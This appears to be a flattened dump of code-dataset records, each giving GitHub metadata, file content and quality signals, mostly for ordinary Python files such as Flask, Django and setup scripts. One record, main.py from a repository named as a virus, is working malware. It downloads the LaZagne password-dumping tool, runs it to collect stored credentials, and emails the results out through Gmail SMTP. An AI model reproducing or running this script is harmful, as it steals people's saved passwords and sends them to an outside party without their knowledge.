hexsha: string
size: int64
ext: string
lang: string
max_stars_repo_path: string
max_stars_repo_name: string
max_stars_repo_head_hexsha: string
max_stars_repo_licenses: list
max_stars_count: int64
max_stars_repo_stars_event_min_datetime: string
max_stars_repo_stars_event_max_datetime: string
max_issues_repo_path: string
max_issues_repo_name: string
max_issues_repo_head_hexsha: string
max_issues_repo_licenses: list
max_issues_count: int64
max_issues_repo_issues_event_min_datetime: string
max_issues_repo_issues_event_max_datetime: string
max_forks_repo_path: string
max_forks_repo_name: string
max_forks_repo_head_hexsha: string
max_forks_repo_licenses: list
max_forks_count: int64
max_forks_repo_forks_event_min_datetime: string
max_forks_repo_forks_event_max_datetime: string
content: string
avg_line_length: float64
max_line_length: int64
alphanum_fraction: float64
qsc_code_num_words_quality_signal: int64
qsc_code_num_chars_quality_signal: float64
qsc_code_mean_word_length_quality_signal: float64
qsc_code_frac_words_unique_quality_signal: float64
qsc_code_frac_chars_top_2grams_quality_signal: float64
qsc_code_frac_chars_top_3grams_quality_signal: float64
qsc_code_frac_chars_top_4grams_quality_signal: float64
qsc_code_frac_chars_dupe_5grams_quality_signal: float64
qsc_code_frac_chars_dupe_6grams_quality_signal: float64
qsc_code_frac_chars_dupe_7grams_quality_signal: float64
qsc_code_frac_chars_dupe_8grams_quality_signal: float64
qsc_code_frac_chars_dupe_9grams_quality_signal: float64
qsc_code_frac_chars_dupe_10grams_quality_signal: float64
qsc_code_frac_chars_replacement_symbols_quality_signal: float64
qsc_code_frac_chars_digital_quality_signal: float64
qsc_code_frac_chars_whitespace_quality_signal: float64
qsc_code_size_file_byte_quality_signal: float64
qsc_code_num_lines_quality_signal: float64
qsc_code_num_chars_line_max_quality_signal: float64
qsc_code_num_chars_line_mean_quality_signal: float64
qsc_code_frac_chars_alphabet_quality_signal: float64
qsc_code_frac_chars_comments_quality_signal: float64
qsc_code_cate_xml_start_quality_signal: float64
qsc_code_frac_lines_dupe_lines_quality_signal: float64
qsc_code_cate_autogen_quality_signal: float64
qsc_code_frac_lines_long_string_quality_signal: float64
qsc_code_frac_chars_string_length_quality_signal: float64
qsc_code_frac_chars_long_word_length_quality_signal: float64
qsc_code_frac_lines_string_concat_quality_signal: float64
qsc_code_cate_encoded_data_quality_signal: float64
qsc_code_frac_chars_hex_words_quality_signal: float64
qsc_code_frac_lines_prompt_comments_quality_signal: float64
qsc_code_frac_lines_assert_quality_signal: float64
qsc_codepython_cate_ast_quality_signal: float64
qsc_codepython_frac_lines_func_ratio_quality_signal: float64
qsc_codepython_cate_var_zero_quality_signal: bool
qsc_codepython_frac_lines_pass_quality_signal: float64
qsc_codepython_frac_lines_import_quality_signal: float64
qsc_codepython_frac_lines_simplefunc_quality_signal: float64
qsc_codepython_score_lines_no_logic_quality_signal: float64
qsc_codepython_frac_lines_print_quality_signal: float64
qsc_code_num_words: int64
qsc_code_num_chars: int64
qsc_code_mean_word_length: int64
qsc_code_frac_words_unique: null
qsc_code_frac_chars_top_2grams: int64
qsc_code_frac_chars_top_3grams: int64
qsc_code_frac_chars_top_4grams: int64
qsc_code_frac_chars_dupe_5grams: int64
qsc_code_frac_chars_dupe_6grams: int64
qsc_code_frac_chars_dupe_7grams: int64
qsc_code_frac_chars_dupe_8grams: int64
qsc_code_frac_chars_dupe_9grams: int64
qsc_code_frac_chars_dupe_10grams: int64
qsc_code_frac_chars_replacement_symbols: int64
qsc_code_frac_chars_digital: int64
qsc_code_frac_chars_whitespace: int64
qsc_code_size_file_byte: int64
qsc_code_num_lines: int64
qsc_code_num_chars_line_max: int64
qsc_code_num_chars_line_mean: int64
qsc_code_frac_chars_alphabet: int64
qsc_code_frac_chars_comments: int64
qsc_code_cate_xml_start: int64
qsc_code_frac_lines_dupe_lines: int64
qsc_code_cate_autogen: int64
qsc_code_frac_lines_long_string: int64
qsc_code_frac_chars_string_length: int64
qsc_code_frac_chars_long_word_length: int64
qsc_code_frac_lines_string_concat: null
qsc_code_cate_encoded_data: int64
qsc_code_frac_chars_hex_words: int64
qsc_code_frac_lines_prompt_comments: int64
qsc_code_frac_lines_assert: int64
qsc_codepython_cate_ast: int64
qsc_codepython_frac_lines_func_ratio: int64
qsc_codepython_cate_var_zero: int64
qsc_codepython_frac_lines_pass: int64
qsc_codepython_frac_lines_import: int64
qsc_codepython_frac_lines_simplefunc: int64
qsc_codepython_score_lines_no_logic: int64
qsc_codepython_frac_lines_print: int64
effective: string
hits: int64
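The schema above describes one record per source file: GitHub metadata (path, repo, head commit, licenses, star/issue/fork event counts and timestamps), the raw file content, and a set of qsc_* quality signals. The records that follow are flattened, one field value per line, in the same column order. A minimal sketch of how such records might be loaded and filtered is given below; it assumes pandas, a hypothetical parquet file name, and illustrative thresholds that are not taken from this dataset.

import pandas as pd

# Hypothetical file name; the real data may be sharded parquet or JSONL files.
df = pd.read_parquet("code_quality_signals.parquet")

# Keep Python files and apply illustrative thresholds on a few of the
# schema columns listed above (values chosen only for demonstration).
mask = (
    (df["lang"] == "Python")
    & (df["alphanum_fraction"] > 0.25)
    & (df["max_line_length"] < 1000)
    & (df["qsc_code_frac_chars_dupe_10grams_quality_signal"] < 0.5)
)
filtered = df[mask]

print(f"kept {len(filtered)} of {len(df)} files")
print(filtered[["max_stars_repo_name", "max_stars_repo_path", "size"]].head())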
4c219c1f42bd3a942209df9b52e42549c3b34e00
309
py
Python
space_trace/__init__.py
SpaceTeam/space-event-trace
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
[ "MIT" ]
2
2022-01-04T00:34:27.000Z
2022-01-04T00:51:14.000Z
space_trace/__init__.py
SpaceTeam/space-event-trace
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
[ "MIT" ]
null
null
null
space_trace/__init__.py
SpaceTeam/space-event-trace
ec00d6895e0bdc2a046ec2d45143d6f8d47ace6f
[ "MIT" ]
null
null
null
import toml
from flask import Flask
from flask_sqlalchemy import SQLAlchemy

app = Flask(__name__, instance_relative_config=True)
app.config.from_file("config.toml", load=toml.load)

db = SQLAlchemy(app)


@app.before_first_request
def create_table():
    db.create_all()


from space_trace import views, cli
18.176471
52
0.789644
46
309
5.021739
0.543478
0.077922
0
0
0
0
0
0
0
0
0
0
0.122977
309
16
53
19.3125
0.852399
0
0
0
0
0
0.035599
0
0
0
0
0
0
1
0.1
false
0
0.4
0
0.5
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
4c237eab0c099d5c3321cd95e513399431effe30
668
py
Python
TransitPass/urls.py
Savior-19/Savior19
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
[ "MIT" ]
null
null
null
TransitPass/urls.py
Savior-19/Savior19
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
[ "MIT" ]
null
null
null
TransitPass/urls.py
Savior-19/Savior19
b80c05a19ebadf73c3d88656b7c34b761cb02f3c
[ "MIT" ]
4
2020-05-27T10:02:31.000Z
2021-07-11T08:14:20.000Z
from django.urls import path

from . import views

urlpatterns = [
    path('apply/', views.FillPassApplication, name='transit-pass-application-form'),
    path('application-details/<int:appln_id>', views.DisplayApplicationToken, name='application-details'),
    path('view-application-list/', views.DisplayApplicationList, name='view-application-list'),
    path('view-application/<int:appln_id>/', views.DisplayIndividualApplication, name='view-individual-application'),
    path('check-application-status/', views.CheckApplicationStatus, name='check-application-status'),
    path('check-pass-validity/', views.CheckPassValidity, name='check-pass-validity'),
]
39.294118
117
0.754491
71
668
7.070423
0.408451
0.089641
0.039841
0.059761
0
0
0
0
0
0
0
0
0.08982
668
17
118
39.294118
0.825658
0
0
0
0
0
0.415546
0.31988
0
0
0
0
0
1
0
false
0.2
0.2
0
0.2
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c263e5689af5df6e8fbc9a6cee80e41efe505e2
2,319
py
Python
frontegg/baseConfig/identity_mixin.py
pinikeizman/python-sdk
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
[ "MIT" ]
null
null
null
frontegg/baseConfig/identity_mixin.py
pinikeizman/python-sdk
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
[ "MIT" ]
null
null
null
frontegg/baseConfig/identity_mixin.py
pinikeizman/python-sdk
f8b2188bdf160408adf0068f2e3bd3cd4b0b4655
[ "MIT" ]
null
null
null
from abc import ABCMeta, abstractmethod from frontegg.helpers.frontegg_urls import frontegg_urls import typing import jwt import requests from frontegg.helpers.logger import logger from jwt import InvalidTokenError class IdentityClientMixin(metaclass=ABCMeta): __publicKey = None @property @abstractmethod def vendor_session_request(self) -> requests.Session: pass @property @abstractmethod def should_refresh_vendor_token(self) -> bool: pass @abstractmethod def refresh_vendor_token(self) -> None: pass def get_public_key(self) -> str: if self.__publicKey: return self.__publicKey logger.info('could not find public key locally, will fetch public key') reties = 0 while reties < 10: try: self.__publicKey = self.fetch_public_key() return self.__publicKey except Exception as e: reties = reties + 1 logger.error( 'could not get public key from frontegg, retry number - ' + str(reties) + ', ' + str(e)) logger.error('failed to get public key in all retries') def fetch_public_key(self) -> str: if self.should_refresh_vendor_token: self.refresh_vendor_token() response = self.vendor_session_request.get( frontegg_urls.identity_service['vendor_config']) response.raise_for_status() data = response.json() return data.get('publicKey') def decode_jwt(self, authorization_header, verify: typing.Optional[bool] = True): if not authorization_header: raise InvalidTokenError('Authorization headers is missing') logger.debug('found authorization header: ' + str(authorization_header)) jwt_token = authorization_header.replace('Bearer ', '') if verify: public_key = self.get_public_key() logger.debug('got public key' + str(public_key)) decoded = jwt.decode(jwt_token, public_key, algorithms='RS256') else: decoded = jwt.decode(jwt_token, algorithms='RS256', verify=False) logger.info('jwt was decoded successfully') logger.debug('JWT value - ' + str(decoded)) return decoded
32.661972
108
0.639069
257
2,319
5.571984
0.354086
0.075419
0.050279
0.046089
0.103352
0.030726
0
0
0
0
0
0.005974
0.278137
2,319
70
109
33.128571
0.849462
0
0
0.175439
0
0
0.131522
0
0
0
0
0
0
1
0.105263
false
0.052632
0.122807
0
0.333333
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c2897e16dece2ba4ecd2dbef042a4f90f011294
786
py
Python
main.py
TheRavehorn/DownloadExecuteReport-Virus
9df26706e504d1df33e07c09fa56baa28d89f435
[ "MIT" ]
null
null
null
main.py
TheRavehorn/DownloadExecuteReport-Virus
9df26706e504d1df33e07c09fa56baa28d89f435
[ "MIT" ]
null
null
null
main.py
TheRavehorn/DownloadExecuteReport-Virus
9df26706e504d1df33e07c09fa56baa28d89f435
[ "MIT" ]
null
null
null
#!/usr/bin/env python3 import requests import subprocess import smtplib import re import os import tempfile def download(url): get_response = requests.get(url) file_name = url.split("/")[-1] with open(file_name, "wb") as f: f.write(get_response.content) def send_mail(email, password, message): server = smtplib.SMTP_SSL("smtp.gmail.com", "465") server.ehlo() server.login(email, password) server.sendmail(email, email, message) server.quit() temp_dir = tempfile.gettempdir() os.chdir(temp_dir) download("https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe") # LaZagne result = subprocess.check_output("lazagne.exe all", shell=True) send_mail("[email protected]", "yourpassword", result) os.remove("lazagne.exe")
24.5625
97
0.720102
110
786
5.054545
0.581818
0.053957
0
0
0
0
0
0
0
0
0
0.011782
0.136132
786
31
98
25.354839
0.807069
0.036896
0
0
0
0.043478
0.2
0
0
0
0
0
0
1
0.086957
false
0.130435
0.26087
0
0.347826
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c31c440814ac777bd4779fa4968cf1b1847bcac
1,263
py
Python
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
47
2017-12-17T00:54:33.000Z
2022-02-25T09:54:52.000Z
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
125
2017-10-27T09:38:10.000Z
2022-03-10T07:53:35.000Z
integration/v2/test_service_instances.py
subhash12/cf-python-client
c0ecbb8ec85040fc2f74b6c52e1f9a6c6c16c4b0
[ "Apache-2.0" ]
50
2018-01-19T07:57:21.000Z
2022-02-14T14:47:31.000Z
import logging
import unittest

from config_test import build_client_from_configuration

_logger = logging.getLogger(__name__)


class TestServiceInstances(unittest.TestCase):
    def test_create_update_delete(self):
        client = build_client_from_configuration()
        result = client.v2.service_instances.create(client.space_guid, "test_name", client.plan_guid, client.creation_parameters)
        if len(client.update_parameters) > 0:
            client.v2.service_instances.update(result["metadata"]["guid"], client.update_parameters)
        else:
            _logger.warning("update test skipped")
        client.v2.service_instances.remove(result["metadata"]["guid"])

    def test_get(self):
        client = build_client_from_configuration()
        cpt = 0
        for instance in client.v2.service_instances.list():
            if cpt == 0:
                self.assertIsNotNone(client.v2.service_instances.get_first(space_guid=instance["entity"]["space_guid"]))
                self.assertIsNotNone(client.v2.service_instances.get(instance["metadata"]["guid"]))
                self.assertIsNotNone(client.v2.service_instances.list_permissions(instance["metadata"]["guid"]))
            cpt += 1
        _logger.debug("test_get - %d found", cpt)
43.551724
129
0.69517
145
1,263
5.786207
0.351724
0.066746
0.125149
0.200238
0.299166
0.261025
0.170441
0
0
0
0
0.010784
0.192399
1,263
28
130
45.107143
0.811765
0
0
0.086957
0
0
0.087886
0
0
0
0
0
0.130435
1
0.086957
false
0
0.130435
0
0.26087
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4c3723af9b53c7e19a14d4d5a300a57c775f6c8c
553
py
Python
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
setup.py
Lif3line/myo-helper
7c71a3ee693661ddba0171545bf5798f46231b3c
[ "MIT" ]
null
null
null
"""Utiltiy functions for working with Myo Armband data.""" from setuptools import setup, find_packages setup(name='myo_helper', version='0.1', description='Utiltiy functions for working with Myo Armband data', author='Lif3line', author_email='[email protected]', license='MIT', packages=find_packages(), url='https://github.com/Lif3line/myo_helper', # use the URL to the github repo install_requires=[ 'scipy', 'sklearn', 'numpy' ], keywords='myo emg')
27.65
85
0.631103
64
553
5.359375
0.65625
0.093294
0.110787
0.151604
0.25656
0.25656
0.25656
0.25656
0
0
0
0.012019
0.24774
553
19
86
29.105263
0.8125
0.151899
0
0
0
0
0.345572
0.049676
0
0
0
0
0
1
0
true
0
0.066667
0
0.066667
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
4c43be0918680e081f3bcc9acc58506e39754d60
1,421
py
Python
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
# setup.py as described in:
# https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable
# to install on your system, run:
# > pip install -e .
from setuptools import setup, find_packages

setup(
    name='typobs',
    version='0.0.3',
    entry_points={
        'console_scripts': [
            'to_obsidian=to_obsidian:run',
            'to_typora=to_typora:run',
        ]
    },
    packages=find_packages(),

    # metadata to display on PyPI
    author="Jerzy Dziewierz",
    author_email="[email protected]",
    description="Convert between Typora and Obsidian link styles",
    keywords="Typora Obsidian Markdown link converter",
    url="https://github.com/jerzydziewierz/typobs",  # project home page, if any
    project_urls={
        "Bug Tracker": "https://github.com/jerzydziewierz/typobs",
        "Documentation": "https://github.com/jerzydziewierz/typobs",
        "Source Code": "https://github.com/jerzydziewierz/typobs",
    },
    classifiers=[
        "Programming Language :: Python",
        "Topic :: Documentation",
        "Topic :: Software Development :: Documentation",
        "Topic :: Office/Business",
        "Topic :: Text Processing :: Filters",
        "Topic :: Text Processing :: Markup",
        "Development Status :: 5 - Production/Stable",
        "Environment :: Console",
        "License :: OSI Approved :: Apache Software License",
    ]
)
36.435897
87
0.640394
152
1,421
5.914474
0.625
0.048943
0.062291
0.124583
0.151279
0
0
0
0
0
0
0.010899
0.225194
1,421
39
88
36.435897
0.805631
0.152006
0
0
0
0
0.584654
0.060884
0
0
0
0
0
1
0
true
0
0.030303
0
0.030303
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
1
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940
776
py
Python
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
1
2020-08-26T12:20:26.000Z
2020-08-26T12:20:26.000Z
import pytest
import numpy as np

from fanok.selection import adaptive_significance_threshold


@pytest.mark.parametrize(
    "w, q, offset, expected",
    [
        ([1, 2, 3, 4, 5], 0.1, 0, 1),
        ([-1, 2, -3, 4, 5], 0.1, 0, 4),
        ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf),
        ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4),
        ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3),
        (
            [-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38],
            0.1,
            0,
            1.93,
        ),
    ],
)
def test_adaptive_significance_threshold(w, q, offset, expected):
    w = np.array(w)
    threshold = adaptive_significance_threshold(w, q, offset=offset)
    assert threshold == expected
27.714286
79
0.474227
135
776
2.674074
0.325926
0.055402
0.041551
0.044321
0.368421
0.368421
0.163435
0.163435
0.127424
0.127424
0
0.192884
0.311856
776
27
80
28.740741
0.483146
0
0
0
0
0
0.028351
0
0
0
0
0
0.043478
1
0.043478
false
0
0.130435
0
0.173913
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4c4be3eb705a80e6147920908a86da5673e90f59
918
py
Python
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
1
2021-02-27T18:35:39.000Z
2021-02-27T18:35:39.000Z
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
week4/string_format.py
MathAdventurer/Data_Mining
b0a06b5f7c13a3762a07eb84518aa4ee56896516
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 26 22:23:07 2020

@author: Neal LONG

Try to construct URL with string.format
"""

base_url = "http://quotes.money.163.com/service/gszl_{:>06}.html?type={}"
stock = "000002"
api_type = 'cp'

print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)

stock = "00002"
print("http://quotes.money.163.com/service/gszl_"+stock+".html?type="+api_type)
print(base_url.format(stock,api_type))
print('='*40)
print('='*40)

print('{:>6}'.format('236'))
print('{:>06}'.format('236'))

print("Every {} should know the use of {}-{} programming and {}"
      .format("programmer", "Open", "Source", "Operating Systems"))

print("Every {3} should know the use of {2}-{1} programming and {0}"
      .format("programmer", "Open", "Source", "Operating Systems"))
27
80
0.623094
129
918
4.348837
0.457364
0.062389
0.085562
0.096257
0.606061
0.541889
0.392157
0.335116
0.335116
0.335116
0
0.070039
0.160131
918
34
81
27
0.657588
0.12963
0
0.529412
0
0
0.509881
0
0
0
0
0
0
1
0
false
0
0
0
0
0.647059
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
1
0
1
4c55251ed58f769e9fbe55114b14a016770952cb
1,075
py
Python
libcity/executor/map_matching_executor.py
nadiaaaaachen/Bigscity-LibCity
d8efd38fcc238e3ba518c559cc9f65b49efaaf71
[ "Apache-2.0" ]
1
2021-11-22T12:22:32.000Z
2021-11-22T12:22:32.000Z
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
from logging import getLogger

from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator


class MapMatchingExecutor(AbstractTraditionExecutor):

    def __init__(self, config, model):
        self.model = model
        self.config = config
        self.evaluator = get_evaluator(config)
        self.evaluate_res_dir = './libcity/cache/evaluate_cache'
        self._logger = getLogger()

    def evaluate(self, test_data):
        """
        use model to test data

        Args:
            test_data
        """
        result = self.model.run(test_data)
        batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
        self.evaluator.collect(batch)
        self.evaluator.save_result(self.evaluate_res_dir)

    def train(self, train_dataloader, eval_dataloader):
        """
        对于传统模型,不需要训练
        Args:
            train_dataloader(torch.Dataloader): Dataloader
            eval_dataloader(torch.Dataloader): Dataloader
        """
        pass  # do nothing
29.861111
94
0.652093
115
1,075
5.869565
0.4
0.071111
0.044444
0.053333
0
0
0
0
0
0
0
0
0.254884
1,075
35
95
30.714286
0.842697
0.163721
0
0
0
0
0.071429
0.036946
0
0
0
0
0
1
0.176471
false
0.058824
0.176471
0
0.411765
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
0
0
0
0
0
1
4c5b0cb42835f92d5cfa623b7b0648900462ba33
1,069
py
Python
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
1
2021-10-30T21:18:29.000Z
2021-10-30T21:18:29.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
22
2020-04-15T14:49:30.000Z
2021-12-22T02:49:52.000Z
examples/simpleWiki.py
klahnakoski/mo-parsing
885bf3fd61430d5fa15164168b975b18988fcf9e
[ "MIT" ]
null
null
null
from mo_parsing.helpers import QuotedString

wikiInput = """
Here is a simple Wiki input:
  *This is in italics.*
  **This is in bold!**
  ***This is in bold italics!***
  Here's a URL to {{Pyparsing's Wiki Page->https://site-closed.wikispaces.com}}
"""


def convertToHTML(opening, closing):
    def conversionParseAction(t, l, s):
        return opening + t[0] + closing

    return conversionParseAction


italicized = QuotedString("*").add_parse_action(convertToHTML("<I>", "</I>"))
bolded = QuotedString("**").add_parse_action(convertToHTML("<B>", "</B>"))
boldItalicized = QuotedString("***").add_parse_action(convertToHTML("<B><I>", "</I></B>"))


def convertToHTML_A(t, l, s):
    try:
        text, url = t[0].split("->")
    except ValueError:
        raise ParseFatalException(s, l, "invalid URL link reference: " + t[0])
    return '<A href="{}">{}</A>'.format(url, text)


urlRef = QuotedString("{{", end_quote_char="}}").add_parse_action(convertToHTML_A)

wikiMarkup = urlRef | boldItalicized | bolded | italicized
28.131579
91
0.635173
128
1,069
5.203125
0.476563
0.048048
0.084084
0.162162
0.178679
0.12012
0
0
0
0
0
0.00346
0.188962
1,069
37
92
28.891892
0.764706
0
0
0
0
0.043478
0.269193
0
0
0
0
0
0
1
0.130435
false
0
0.043478
0.043478
0.304348
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
4c5e8dbae6d19592874e45bede3206b69cd9c042
594
py
Python
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
genlicense.py
d53dave/python-crypto-licensecheck
d11612612ea54a5418fd8dbba9212a9c84c56f22
[ "CNRI-Python", "RSA-MD" ]
null
null
null
import sys

from Crypto.Signature import pkcs1_15
from Crypto.Hash import SHA256
from Crypto.PublicKey import RSA


def sign_data(key, data, output_file):
    with open(key, 'r', encoding='utf-8') as keyFile:
        rsakey = RSA.importKey(keyFile.read())
    signer = pkcs1_15.new(rsakey)
    digest = SHA256.new(data.encode('utf-8'))

    with open(output_file, 'wb') as out:
        out.write(signer.sign(digest))


if __name__ == '__main__':
    key_file = sys.argv[1]
    input_string = sys.argv[2]
    out_file = sys.argv[3]
    sign_data(key_file, input_string, out_file)
28.285714
53
0.66835
89
594
4.235955
0.494382
0.079576
0.058355
0
0
0
0
0
0
0
0
0.03617
0.208754
594
20
54
29.7
0.765957
0
0
0
0
0
0.035354
0
0
0
0
0
0
1
0.0625
false
0
0.3125
0
0.375
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
1
4c66a4345821de6dcbba5bb0bbb633c3ee79daa3
2,219
py
Python
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
simewu/bitcoin_researcher
b9fd2efdb8ae8467c5bd4b3320713a541635df16
[ "MIT" ]
1
2020-02-15T21:44:04.000Z
2020-02-15T21:44:04.000Z
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
tools/Bitcoin Parser/blockchain_parser/tests/test_block.py
SimeoW/bitcoin
3644405f06c8b16a437513e8c02f0f061b91be2e
[ "MIT" ]
null
null
null
# Copyright (C) 2015-2016 The bitcoin-blockchain-parser developers # # This file is part of bitcoin-blockchain-parser. # # It is subject to the license terms in the LICENSE file found in the top-level # directory of this distribution. # # No part of bitcoin-blockchain-parser, including this file, may be copied, # modified, propagated, or distributed except according to the terms contained # in the LICENSE file. import unittest from datetime import datetime from .utils import read_test_data from blockchain_parser.block import Block class TestBlock(unittest.TestCase): def test_from_hex(self): block_hex = read_test_data("genesis_block.txt") block = Block.from_hex(block_hex) self.assertEqual(1, block.n_transactions) block_hash = "000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1" \ "b60a8ce26f" self.assertEqual(block_hash, block.hash) self.assertEqual(486604799, block.header.bits) merkle_root = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \ "b7afdeda33b" self.assertEqual(merkle_root, block.header.merkle_root) self.assertEqual(2083236893, block.header.nonce) self.assertEqual(1, block.header.version) self.assertEqual(1, block.header.difficulty) self.assertEqual(285, block.size) self.assertEqual(datetime.utcfromtimestamp(1231006505), block.header.timestamp) self.assertEqual("0" * 64, block.header.previous_block_hash) for tx in block.transactions: self.assertEqual(1, tx.version) tx_hash = "4a5e1e4baab89f3a32518a88c31bc87f618f76673e2cc77ab2127" \ "b7afdeda33b" self.assertEqual(tx_hash, tx.hash) self.assertEqual(204, tx.size) self.assertEqual(0, tx.locktime) self.assertEqual(0xffffffff, tx.inputs[0].transaction_index) self.assertEqual(0xffffffff, tx.inputs[0].sequence_number) self.assertTrue("ffff001d" in tx.inputs[0].script.value) self.assertEqual("0" * 64, tx.inputs[0].transaction_hash) self.assertEqual(50 * 100000000, tx.outputs[0].value)
43.509804
79
0.68995
250
2,219
6.028
0.388
0.179164
0.042468
0.041805
0.119443
0.045123
0
0
0
0
0
0.111175
0.221722
2,219
50
80
44.38
0.761436
0.177557
0
0.057143
0
0
0.120728
0.088203
0
0
0.011025
0
0.542857
1
0.028571
false
0
0.114286
0
0.171429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
0
0
0
0
0
0
0
0
1
4c6c5b767e3d2e7d380bed49701614a213de873b
8,063
py
Python
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
examples/plots/plot_pass_network.py
DymondFormation/mplsoccer
544300857ec5936781e12fda203cf2df8a3d00b9
[ "MIT" ]
null
null
null
